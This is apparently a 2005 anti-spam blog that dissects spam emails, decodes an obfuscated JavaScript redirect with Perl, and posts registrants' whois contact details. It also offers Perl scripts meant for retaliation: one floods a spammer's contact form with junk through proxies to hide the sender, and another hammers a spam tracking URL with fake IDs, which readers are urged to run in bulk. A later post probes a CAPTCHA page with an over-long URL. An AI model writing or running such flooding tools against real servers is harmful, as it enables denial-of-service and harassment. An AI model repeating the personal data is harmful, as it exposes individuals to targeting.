5 POS3-0.GW5.BOS4.ALTER.NET (208.192.182.173) 8.11 ms 7.466 ms 8.186 ms
6 0.so-2-0-0.CL1.BOS4.ALTER.NET (152.63.25.70) 8.315 ms 23.281 ms 21.669 ms
7 0.so-4-0-0.XL1.SAC1.ALTER.NET (152.63.53.245) 98.949 ms 96.628 ms 102.104 ms
8 POS6-0.IG3.SAC1.ALTER.NET (152.63.54.121) 93.654 ms 106.122 ms 98.970 ms
9 hkbn-gw.customer.alter.net (208.214.139.106) 268.645 ms 280.339 ms 275.420 ms
10 61.244.232.105 (61.244.232.105) 295.729 ms 255.630 ms 261.515 ms
11 61.244.232.170 (61.244.232.170) 267.802 ms 254.997 ms 256.17 ms
12 059148144203.ctinets.com (59.148.144.203) 262.475 ms 259.126 ms 253.566 ms

http://www.google.com/search?hl=en&lr=&client=safari&rls=en&q=site:ctinets.com
shows that the citnets site is clearly from China.

Welcome to the Victims side

2005-12-07T23:51:00.000-05:00

I have been using a hosted server for the last few years. They provide me with cheap presence on the net and they even allow for lots of email address (technically unlimited). Over the last few days my "bounce account" has been flooded every morning. I didn't know what to make of it at first. Maybe someone tracked me down via this blog (not impossible) and decided to exact some revenge. Spammers are scummy people to begin with so I wouldn't put this past them. Maybe someone was just flooding me directly?
Today I noticed a strange pattern in the bounce messages. They all were from a specific company (which I can't name) and looked pretty legitamate. So I looked into the email (with a hex editor) and it was authentic. My heart sank as I realized I was now a victim. My mail server had been coerced into helping these assholes. Since the server is hosted there isn't much I can do from here. I don't have direct access to the mail server in question so I can't shutdown SMTP or even investigate the logs. All I can do is issue help requests and wait. I have started tracking down the multiple mirrors of this particular spam in online mailing list archives. I'm doing what I can to contact the other domain name admins who seem to have been affected.
This may be the final straw for me to start running my own mail server.

powerful enlargement

2005-11-27T08:07:00.000-05:00

X-Account-Key: account2
X-UIDL: 1132365525.24507.victim.com,S=1554
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path:
Delivered-To: victim@4
Received: (qmail 24497 invoked from network); 19 Nov 2005 01:58:44 -0000
Received: from unknown (HELO zipmail.com.br) (60.171.109.114)
by victim.com with SMTP; Fri, 18 Nov 2005 20:58:44 -0500
Message-ID:
Date: Fri, 18 Nov 2005 07:32:47 +0800
From: "madonna black"
User-Agent: MOMENTUM (3.0 build(25) [Asynch])
X-Accept-Language: en-us
MIME-Version: 1.0
To: "Victim Victim"
Subject: powerful enlargement
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Male enhancement is achieving your goals of becoming a better man

90% of males were interested in improving their sexual stamina,
performance, and the size of their manhood. Are you one of the 90%?

You guys have made my dreams come true. I have been self-conscience for as
long as I can remember. I did not want to shower with other guys growing up,
because I was embarrassed. Not only has your system increased the size of my
manhood while erect, but it has helped my size while flaccid as well. I hang
bigger, and I feel more like the man I should have been all these years. The
change is tremendous, I wanted to send you this note to let you know what it
has done for me, and of course to order more LONGZ! Leroy, Brooklyn

check out the only Male Enhancement formula with a free DVD

http://geocities.yahoo.com.br/clifton_smothers/?7=X2

not for you, then use link above

The President bowed gravely. This is your invention? he asked
No; I'm hardly equal to that

Please wait while the web page loads

In a market research, men identified three things
as essential elements of achieving a satisfactory erection, including:

The ability to attain an erection

Erection hardness

The ability to maintain it for satisfactory sex

Taken together these make up erection quality (EQ).

Many men have been, or will be, concerned with the
quality of their erection at some time in their life. It may be an occasional
difficulty in getting or maintaining an erection; it could be an erection that
is just not as hard as it once was; or it may be a consistent inability to
achieve an erection.

It is estimated that over 30 million men in the US have
experienced at least partial erectile dysfunction (ED). You are not alone if you
experience a loss of erectile function.

Fortunately, if you've noticed changes in your erection
there is something you can do about it, talk to your
doctor.

The technique used by this spammer is called obfusication and we have been talking about this a lot in this particular blog. A quick refresher for those who are a little rusty on the unescape javascript function can be found here

JavaScript unescape
Answer: To convert a string from URL-encoded form, use the JavaScript function
unescape(string) . This function works as follows: if the string contains ...
www.javascripter.net/faq/unescape.htm - 3k - Cached - Similar pages

eval(unescape("\x76\x61\x72\x25\x32\x30\x55\x52\x49\x25\x33\x42\x25\x30\x44\x25
\x30\x41\x76\x61\x72\x25\x32\x30\x53\x43\x52\x49\x50\x54\x5F\x4E\x41\x4D\x45\x25
\x33\x42\x25\x30\x44\x25\x30\x41\x76\x61\x72\x25\x32\x30\x51\x55\x45\x52\x59\x5F
\x53\x54\x52\x49\x4E\x47\x25\x33\x42\x25\x30\x44\x25\x30\x41\x76\x61\x72\x25\x32
\x30\x5F\x47\x45\x54\x25\x33\x44\x6E\x65\x77\x25\x32\x30\x41\x72\x72\x61\x79\x25
\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x66\x75\x6E\x63\x74\x69
\x6F\x6E\x25\x32\x30\x5F\x63\x67\x69\x5F\x70\x61\x72\x73\x65\x5F\x61\x72\x67\x73
\x25\x32\x38\x25\x32\x39\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61
\x72\x25\x32\x30\x69\x25\x32\x43\x74\x6D\x70\x25\x32\x43\x74\x6D\x70\x32\x25\x32
\x43\x74\x6D\x70\x33\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x74\x72\x79
\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x55\x52\x49\x25\x33\x44\x6C\x6F
\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x25\x33\x42\x25\x30\x44\x25\x30\x41
\x25\x30\x39\x74\x6D\x70\x25\x33\x44\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x73\x65
\x61\x72\x63\x68\x2E\x73\x75\x62\x73\x74\x72\x25\x32\x38\x31\x25\x32\x43\x6C\x6F
\x63\x61\x74\x69\x6F\x6E\x2E\x73\x65\x61\x72\x63\x68\x2E\x6C\x65\x6E\x67\x74\x68
\x2D\x31\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x74\x6D\x70
\x32\x25\x33\x44\x74\x6D\x70\x2E\x73\x70\x6C\x69\x74\x25\x32\x38\x25\x32\x32\x25
\x32\x36\x25\x32\x32\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39
\x66\x6F\x72\x25\x32\x38\x69\x25\x33\x44\x30\x25\x33\x42\x69\x25\x33\x43\x74\x6D
\x70\x32\x2E\x6C\x65\x6E\x67\x74\x68\x25\x33\x42\x69\x2B\x2B\x25\x32\x39\x25\x37
\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x25\x30\x39\x74\x6D\x70\x33\x25\x33\x44
\x74\x6D\x70\x32\x25\x35\x42\x69\x25\x35\x44\x2E\x73\x70\x6C\x69\x74\x25\x32\x38
\x25\x32\x32\x25\x33\x44\x25\x32\x32\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30
\x41\x25\x30\x39\x25\x30\x39\x5F\x47\x45\x54\x25\x35\x42\x74\x6D\x70\x33\x25\x35
\x42\x30\x25\x35\x44\x25\x35\x44\x25\x33\x44\x74\x6D\x70\x33\x25\x35\x42\x31\x25
\x35\x44\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x25\x37\x44\x25\x30\x44
\x25\x30\x41\x25\x30\x39\x25\x37\x44\x63\x61\x74\x63\x68\x25\x32\x38\x65\x25\x32
\x39\x25\x37\x42\x61\x6C\x65\x72\x74\x25\x32\x38\x65\x2E\x64\x65\x73\x63\x72\x69
\x70\x74\x69\x6F\x6E\x25\x32\x39\x25\x33\x42\x25\x37\x44\x25\x30\x44\x25\x30\x41
\x25\x37\x44\x25\x30\x44\x25\x30\x41\x5F\x63\x67\x69\x5F\x70\x61\x72\x73\x65\x5F
\x61\x72\x67\x73\x25\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x76
\x61\x72\x25\x32\x30\x71\x25\x32\x30\x25\x33\x44\x25\x32\x30\x25\x32\x32\x37\x25
\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x69\x66\x25\x32\x38\x5F\x47\x45\x54
\x25\x35\x42\x71\x25\x35\x44\x25\x32\x39\x25\x37\x42\x25\x30\x44\x25\x30\x41\x25
\x30\x39\x76\x61\x72\x25\x32\x30\x70\x72\x65\x66\x69\x78\x25\x32\x30\x25\x33\x44
\x25\x32\x30\x25\x32\x37\x68\x74\x74\x70\x25\x33\x41\x2F\x2F\x77\x77\x77\x2E\x25
\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x64\x6F\x63\x75\x6D\x65
\x6E\x74\x2E\x74\x69\x74\x6C\x65\x25\x33\x44\x25\x32\x32\x4C\x6F\x6E\x67\x25\x32
\x30\x4D\x61\x6C\x65\x25\x32\x30\x45\x6E\x68\x61\x6E\x63\x65\x6D\x65\x6E\x74\x25
\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61\x72\x25\x32\x30
\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x32\x30\x25\x33\x44\x25\x32\x30\x6E\x65\x77
\x25\x32\x30\x41\x72\x72\x61\x79\x25\x32\x38\x25\x32\x39\x25\x33\x42\x25\x30\x44
\x25\x30\x41\x25\x30\x39\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x74\x64\x6F
\x6D\x61\x69\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68\x25\x35\x44\x25\x33\x44\x25\x32
\x37\x6C\x6F\x77\x70\x72\x69\x63\x65\x73\x6F\x6E\x70\x6C\x61\x74\x69\x6E\x75\x6D
\x73\x2E\x63\x6F\x6D\x2F\x6C\x7A\x25\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41
\x25\x30\x39\x74\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x74\x64\x6F\x6D\x61\x69
\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68\x25\x35\x44\x25\x33\x44\x25\x32\x37\x6F\x75
\x72\x62\x65\x73\x74\x70\x72\x6F\x6D\x6F\x74\x69\x6F\x6E\x73\x73\x69\x74\x65\x2E
\x63\x6F\x6D\x2F\x6C\x67\x25\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30
\x39\x76\x61\x72\x25\x32\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x69\x6E\x64\x65\x78\x25
\x32\x30\x25\x33\x44\x25\x32\x30\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32
\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x25\x32
\x30\x2A\x25\x32\x30\x74\x64\x6F\x6D\x61\x69\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68
\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61\x72\x25\x32
\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x74\x6F\x25\x32\x30\x25\x33\x44\x25\x32\x30\x74
\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x64\x6F\x6D\x61\x69\x6E\x5F\x69\x6E\x64
\x65\x78\x25\x35\x44\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x6C\x6F\x63
\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x25\x33\x44\x70\x72\x65\x66\x69\x78\x25
\x32\x30\x2B\x25\x32\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x74\x6F\x25\x32\x30\x2B\x25
\x32\x30\x25\x32\x32\x2F\x25\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x37
\x44"));

First Let's break apart the text glob into individual characters:


my $text = '\x76\x61\x72\x25\x32\x30\x55\x52'; ##snipped for formatting
my @characters = split(/\\x/,$text);

foreach my $char (@characters)
{
        print "$char ";
}

this will give us something like this
76 61 72 25 32 30 55 52 49 25 33 42 25 30 44 25 30 41 76 ...

Notice that $text is using single quotes and not double. Using double quotes will interpret some of the results for us but not all.

old value: 'var%20URI%3B%0D%0Avar%20SCRIPT_NAME%3B%0D%0Avar%20QUERY_STRING%3B%0D%0Avar
%20_GET%3Dnew%20Array%28%29%3B%0D%0Afunction%20_cgi_parse_args%28%29%7B%0D%0A
%09var%20i%2Ctmp%2Ctmp2%2Ctmp3%3B%0D%0A%09try%7B%0D%0A%09URI%3Dlocation.href
%3B%0D%0A%09tmp%3Dlocation.search.substr%281%2Clocation.search.length-1%29%3B
%0D%0A%09tmp2%3Dtmp.split%28%22%26%22%29%3B%0D%0A%09for%28i%3D0%3Bi%3C
tmp2.length%3Bi++%29%7B%0D%0A%09%09tmp3%3Dtmp2%5Bi%5D.split%28%22%3D%22%29%3B
%0D%0A%09%09_GET%5Btmp3%5B0%5D%5D%3Dtmp3%5B1%5D%3B%0D%0A%09%7D%0D%0A%09%7Dcatch
%28e%29%7Balert%28e.description%29%3B%7D%0D%0A%7D%0D%0A_cgi_parse_args%28%29
%3B%0D%0Avar%20q%20%3D%20%227%22%3B%0D%0Aif%28_GET%5Bq%5D%29%7B%0D%0A%09var
%20prefix%20%3D%20%27http%3A//www.%27%3B%0D%0A%09document.title%3D%22Long
%20Male%20Enhancement%22%3B%0D%0A%09var%20tdomains%20%3D%20new%20Array%28%29
%3B%0D%0A%09tdomains%5Btdomains.length%5D%3D%27lowpricesonplatinums.com/lz
%27%3B%0D%0A%09tdomains%5Btdomains.length%5D%3D%27ourbestpromotionssite.com/lg
%27%3B%0D%0A%09var%20domain_index%20%3D%20Math.floor%28Math.random%28%29%20*
%20tdomains.length%29%3B%0D%0A%09var%20domain_to%20%3D%20tdomains%5Bdomain_index
%5D%3B%0D%0A%09location.href%3Dprefix%20+%20domain_to%20+%20%22/%22%3B%0D%0A%7D'

Ok on second thought it may be better to just enclose them in double quotes and get it over with. The unpacking reveals the same code. It's early for me.


use strict;
my $text=''; ### stuff the hex encoded values from earlier in here 
my @characters = split(/\\x/,$text);

foreach my $char (@characters)
{
     print pack("C", hex($char))
}

I output the results into a file called spam.decoded.htm

There is a location.href in there which will take us to the target spam sites. The double coding is starting to annoy me so let's get everything "rendered"

PERL is powerful for it's simple elegance. If you ever feel that the solution is getting to complicated it likely IS.


use strict;

open(SPAM,"< spam.decoded.htm");
my $text = <SPAM>;
close(SPAM);

$text=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $text;

This produces the raw code that the spammer tried so hard to hide from prying eyes.
For a javascript redirect it's fairly complex.


var URI;
var SCRIPT_NAME;
var QUERY_STRING;
var _GET=new Array();
function _cgi_parse_args(){
        var i,tmp,tmp2,tmp3;
        try{
        URI=location.href;
        tmp=location.search.substr(1,location.search.length-1);
        tmp2=tmp.split("&");
        for(i=0;i<tmp2.length;i++){
                tmp3=tmp2[i].split("=");
                _GET[tmp3[0]]=tmp3[1];
        }
        }catch(e){alert(e.description);}
}
_cgi_parse_args();
var q = "7";
if(_GET[q]){
        var prefix = 'http://www.';
        document.title="Long Male Enhancement";
        var tdomains = new Array();
        tdomains[tdomains.length]='lowpricesonplatinums.com/lz';
        tdomains[tdomains.length]='ourbestpromotionssite.com/lg';
        var domain_index = Math.floor(Math.random() * tdomains.length);
        var domain_to = tdomains[domain_index];
        location.href=prefix + domain_to + "/";

this may end up as a two part post so I can spend some more time analyzing the javascript above. I dug into the domain names presented and here is what I found

Domain name: LOWPRICESONPLATINUMS.com
Status:lock

Registrant:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Administrative Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Technical Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Billing Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Nameserver Information:
ns1.lowpricesonplatinums.com
ns2.lowpricesonplatinums.com

Create: 2005-11-03 14:26:47
Update: 2005-11-16
Expired: 2006-11-03

Domain name: ourbestpromotionssite.com
Status:lock

Registrant:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Administrative Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Technical Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Billing Contact:
Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com
+86.2884375193 +86.2884375193
37 Wugui Qiao
??? ??? 610038
CN

Nameserver Information:
ns1.ourbestpromotionssite.com
ns2.ourbestpromotionssite.com

Create: 2005-11-03 14:26:58
Update: 2005-11-16
Expired: 2006-11-03

I become very sad once I see it's a Chinese site involved. I know there is essentially nothing that can be done at this point. No point in even trying to track down Zhang Yong Qi
The syndey_heartilly@yahoo.com address is likely a throw away account but send a note anyway to let Yong Qi know that Spam sucks.

cheat adsense

2005-10-02T04:41:00.000-04:00

[spammed to my blog]
I have been to your site and I too am working very hard at cheat adsense to increase my revenue. I am also looking into many NEW ways to utilize the design to further direct people to follow my ads.
cheat adsense

Human stupidity always amazes me. Who would be dumb enough to spam a blog whose sole purpose is to track down spammers? DEAN HARTMANN is such a man. Dean has taken up the challenge of being the most idiotic person on the planet and I think he's doing quite well at it. I had three comments on my blog, which I doubt very many people even read, from Dan peddling some adsense scheme. I traced his link (http://www.bloglinkbuilder.com/profittips) via whois to SYC Enterprises. I haven't done much research on this "business" but it's linked to a bunch of spamming related schemes. Most of the pages are already down but thankfully there are google caches. Could this be our prized idiot? It's possible, the page is hosted on a site regarding "joint marketing" efforts. Apparently Dan believes that he is simply marketing via the Internet and not polluting it with worthless crap. This isn't the first time for Dan either. He is listed on Spam Warden who shows he's affliated with The SFI Marketing Group.
SFI claims to have BBB membership so if your the victim of some of their new "marketing" efforts perhaps you should drop the BBB a line to let them know what Dean is up to. No perl code in this post. I just wanted to track down the moron who spammed my blog.

Replica Watches for Low Prices

2005-09-16T16:28:00.000-04:00

Return-Path:
Delivered-To: spam@victim
Received: (qmail 4047 invoked from network); 16 Sep 2005 07:39:24 -0000
Received: from unknown (HELO ath.forthnet.gr) (218.2.113.9)
by loop.phpwebhosting.com with SMTP; 16 Sep 2005 07:39:24 -0000
Received: from 149.140.93.179 by smtp.freesurf.ch;
Fri, 16 Sep 2005 07:35:04 +0000
Message-ID: <4cfb01c5ba91$3816de36$68078028@ath.forthnet.gr>
From: "Tammy M. Bryant"
To: spam@victim
Subject: Replica Watches for Low Prices
Date: Fri, 16 Sep 2005 15:34:50 +0800
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Do you want a high quality replica?

In our online store you can buy replicas of Rolex watches and
other brands. They look and feel exactly like the real thing.

- We have 20+ different brands in our selection
- Free shipping if you order 5 or more
- Save up to 40% compared to the cost of other replicas
- Standard Features:
- Screw-in crown
- Unidirectional turning bezel where appropriate
- All the appropriate rolex logos, on crown and dial
- Heavy weight

Visit us: http://rlox.com/

Best regards,
Fredrick Steiner

No thanks: http://rlox.com/z.php

I took a peek at this site through lynx and saw that the site redirected you to
http://replica-watch-store.net

WHOIS information for replica-watch-store.net:

[whois.joker.com]
domain: replica-watch-store.net
owner: Luis Alberto
email: admin@newbiemail.net
address: AVENIDA 6
address: CALLE 21/23
city: SAN JOSE
state: --
postal-code: CR
country: CR
phone: +506 223-24-06
admin-c: admin@newbiemail.net#0
tech-c: admin@newbiemail.net#0
billing-c: admin@newbiemail.net#0
nserver: ns1.replica-watch-store.net 221.11.134.23
nserver: ns2.replica-watch-store.net 221.11.134.23
status: lock
created: 2005-08-17 12:47:38 UTC
modified: 2005-08-18 09:36:43 UTC
expires: 2006-08-17 08:47:38 UTC
source: joker.com live whois service
query-time: 0.074216
db-updated: 2005-09-16 20:14:51

Spamming isn't very nice Luis. And it would seem that this isn't Luis' first time doing this either. A search on Google yields some other hits on toastedspam.com where he was hawking pharmacy related goods.

I found a contact page on his website with a form to mail him. That was very thoughtful of you.

Here is the important code from this page
<form action="contact_mail.php" method="post">
<tr><td class=t2>Name</td><td class=t2><input type=text name=realname value="" size=30></td></tr>
<tr><td class=t2>Email</td><td class=t2><input type=text name=email value="" size=30></td></tr>
<tr><td class=t2>Subject</td><td class=t2><input type=text name=subject value="" size=30></td></tr>

<tr><td class=t2>Query</td><td class=t2><textarea name=comments rows=6 cols=25></textarea></td></tr>
<tr><td colspan=2 align=center class=t2><input type=submit value=Submit name=submit></td></tr>
</form>

The "action" is set to contact_mail.php and the variables are simply realname, email, subject, and then comments. Comments is where the message goes. Ok so let's whip up a simple script that will let you know how we spamming victims feel.

The newest addition to my code is a proxy list. I'm not going to give up my IP to this scum so I'll go through proxies and play hide-n-seek like he does.

** NOTE: you would have to supply your own list, oh and it's neutured so again if you don't know how to code this will not work for you :) **

#!/usr/bin/perl
## This code is covered by the GPL so feel free to reuse it according
## to those rules. If you are a spammer you must castrate yourself
## before even looking at this code. And then you are still not
## allowed to use it.

use strict;
use LWP;

my @proxies=('127.0.0.1','127.0.0.2');

my $method='POST';
my $target='http://replica-watch-store.net/contact_mail.php';
my $message='INSERT YOUR MESSAGE HERE';

&main();

sub send_request
{

my ($target,$proxy_address) = @_;
my $ua = LWP::UserAgent->new;
my $proxy='http://' . $proxy_address;
$ua->proxy(['http'] => $proxy);

# Create a request
my $req = HTTP::Request->new($method => $target);
my $yousuck="realname=".crap(30)."email=".crap(30)."subject=".crap(30)."comments=".$message;
$req->content_type('application/x-www-form-urlencoded');
$req->content($yousuck);

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $proxy,"\n";
}
else {
print $proxy . " " . $res->status_line. "\n";
}

}

sub crap
{
my $iterations=$_[0];
my $junk;
my $count;
for ($count=1; $count<$iterations; $count++)
{
$junk.=chr(rand(256));
}
}

sub deliver_message
{
my $url=$_[0];
foreach my $proxy (@proxies)
{
send_request($url,$proxy);
sleep(1);
}
}

sub main
{
while (0)
{
deliver_message($target);
}

}

MS Office 2003 Pro $69.95 Windows

2005-05-23T00:54:00.000-04:00

This is just to show what a poor spam looks like

All the links in the email look like this:
http://%25rnd_url/?h

The %25rnd_url portion means that this came from a "kit" and the spammer either ran the generation incorrectly or the original author is an idiot. I could see either case holding true. I'm too tired to track this scum down tonight. Maybe later :)

For some reason there is a google adsense embedded. I would imagine this could identify the person if needed

QuarkXPress 6.0 $60

2005-05-17T08:38:00.000-04:00

I've begun to setup up spam catching accounts and recently this little gem came my way. The idea is generally they scam you for money by offering really cheap software. If you're lucky (sort of) you will get a pirated version of the software. More then likely you will get nothing. This spammer employs and ID system to figure out which emails are live. A 33 character key is used like this

http://5bbegging.bubxsx.info/?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
After you visit that url you are automatically redirected back to '/' and shown the selection of software. WARNING: JUST LOOKING AT THE IMAGES IN THE EMAIL WILL LIKELY TAG YOU!
So this is why I am using catcher accounts :) I abandon them all the time so I don't care if they are tagged. To further annoy this person I have refined my earlier false positive generator. I used a random password generator script found here coupled with psudeo random number generation to make a nice fake ID which will hit the website. The output isn't very pretty, just a look at the hash to make sure it is somewhat random and the HTTP code to let me know it's working.

MTE0MjI1NDYzMjg3Ljc5ODp4MzVqOGU 200 OK
OTMyMzg1ODg5MDcuNDA5ODpob190cXA 200 OK
MjkxMzU1Nzg2MzkuNTEzNTp2d3g0dCU 200 OK
Nzc4NDE4ODU2NjYuNTcwNzp3cHJfYjk 200 OK
NDM1NDM1NzczNjcuMDE4OTptX3I1MXg 200 OK
NzQxNjA5NDQwMjAuNjYyNTo0anpxa2N 200 OK
MTQ0ODU5MDUzODkwLjc3MTp5ZjFsfHN 200 OK
MTAwOTkzMjE0NTEwLjU1ODpqcGYtcCV 200 OK
MTM5NjM3MTk0ODk5LjQwNjppdmhmdW1 200 OK
MTY5NzA4MTQyNDM4LjU3NjpyZWYtJXI 200 OK

Here is the code which is free to use in the pursuit of spammer hunting.

#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;
use MIME::Base64;

# Create a user agent object
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/8.0"); # pretend we are very capable browser :)

my $baseURL='http://5bbegging.bubxsx.info/?';

sub randomPassword {
my $password;
my $_rand;

my $password_length = $_[0];
if (!$password_length) {
$password_length = 10;
}

my @chars = split(" ",
"a b c d e f g h i j k l m n o p q r s t u v w x y z
- _ % # |
0 1 2 3 4 5 6 7 8 9");

srand;

for (my $i=0; $i <= $password_length ;$i++) {
$_rand = int(rand 41);
$password .= $chars[$_rand];
}
return $password;
}

sub getPage
{
my $key = localtime();
#removing anything that is not a digit
$key=~s/\D//g;
$key=rand($key);
my $text=randomPassword();
my $encoded = encode_base64("$key:$text");

#original email had a 16 char hash so just making sure mine is similar
my $hash=substr($encoded,0,31);

my $req = HTTP::Request->new(GET => $baseURL.$hash);
$req->header('Accept' => 'text/html');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $hash . " " .$res->status_line . "\n";
}
else {
print "Error: " . $res->as_string . "\n" if ($res->status_line!~/404/);
}
}

#######################################################
# modified so non perl users won't hurt themselves :)
# mine is set to 500 and I just run it a few times
# a day. feel free to set yours to 9999999999999
#######################################################
foreach my $try (1..2)
{
getPage();
}

Re: Pharamacy[33:34]

2005-03-22T23:45:00.000-05:00

Delivered-To: jake@domain.com
Received: (qmail 15747 invoked from network); 22 Mar 2005 17:14:52 -0000
Received: from unknown (HELO kaytonelectric.com) (81.158.238.67)
by loop.phpwebhosting.com with SMTP; 22 Mar 2005 17:14:52 -0000
From: "Zofia Flood"
To: "Dionysodoros Huff"
Subject: Re: Pharamacy[33:34]
Date: Tue, 22 Mar 2005 12:11:16 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0008_01C52E1D.42405FCE"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

Hello , Visit Our PharmmacyByMailSHOP and Save 75%

Normally these types of URLs are meant to make someone think they are accessing a more reputable site. Generally they are in the same field that they are pitching their wares from. So this one is a bit confusing. wc.com is the home of Williams & Connolly which is a large litigation firm. The spam is obviously trying to sell prescriptions so I'm not real sure what they are trying to do here. Maybe bypass filters?

the domain is owned by Richard Syke
Domain Name : bodpartatthe.com

::Registrant::
Name : Richard Syke
Email : richard_syke@yahoo.com
Address : 27/F One Pacific Place,
Zipcode : HK
Nation : HK
Tel : 1-888-242-0845
Fax : 1-888-242-0845

::Administrative Contact::
Name : Richard Syke
Email : richard_syke@yahoo.com
Address : 27/F One Pacific Place,
Zipcode : HK
Nation : HK
Tel : 1-888-242-0845
Fax : 1-888-242-0845

::Technical Contact::
Name : Richard Syke
Email : richard_syke@yahoo.com
Address : 27/F One Pacific Place,
Zipcode : HK
Nation : HK
Tel : 1-888-242-0845
Fax : 1-888-242-0845

::Name Servers::
ns0.vocalerformancare.com
ns1.vocalerformancare.com

::Dates & Status::
Created Date 2005-03-21 07:20:28 EST
Updated Date 2005-03-21 07:20:28 EST
Valid Date 2006-03-21 07:20:28 EST
Status ACTIVE

The 'contact info' page lists the address as:
Palm Grove House, P.O.Box 438, Road Town, Tortola, British Virgin Islands

There is a secure code field in the form so one can not spam them from the web form.
IS THIS IRONIC TO ANYONE ELSE?

It's like a mugger concerned about being pickpocketed. The system is retarded though.
The image is created by going to a page called secure.asp. This page takes a parameter which looks like MIME or something. This creates the same image everytime. So if one knows what the letters are encoded with then they will be able to "guess" the secret code by deriving it from the url supplied in the image.
Example:
http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=UhYuh1t=
AB392

http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=UTYuh1t=
Bb392

OK before breaking this .. well I guess it could be classified as crypto but that's sort of stretching the term... let's have some fun with their processes.
7 characters and we can just generate our own "image maker". It actually takes more then 7 digits. Since it's aspx (IIS6) there is a sanity checker on the length of the URI. So just putting a few thousand characters got this response:

Request-URI Too Large
The requested URL's length exceeds the capacity limit for this server.

request failed: URI too long

This one works though:

<br />http://www.bx.wc.com.bodpartatthe.com/aspx/secure.asp?text=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000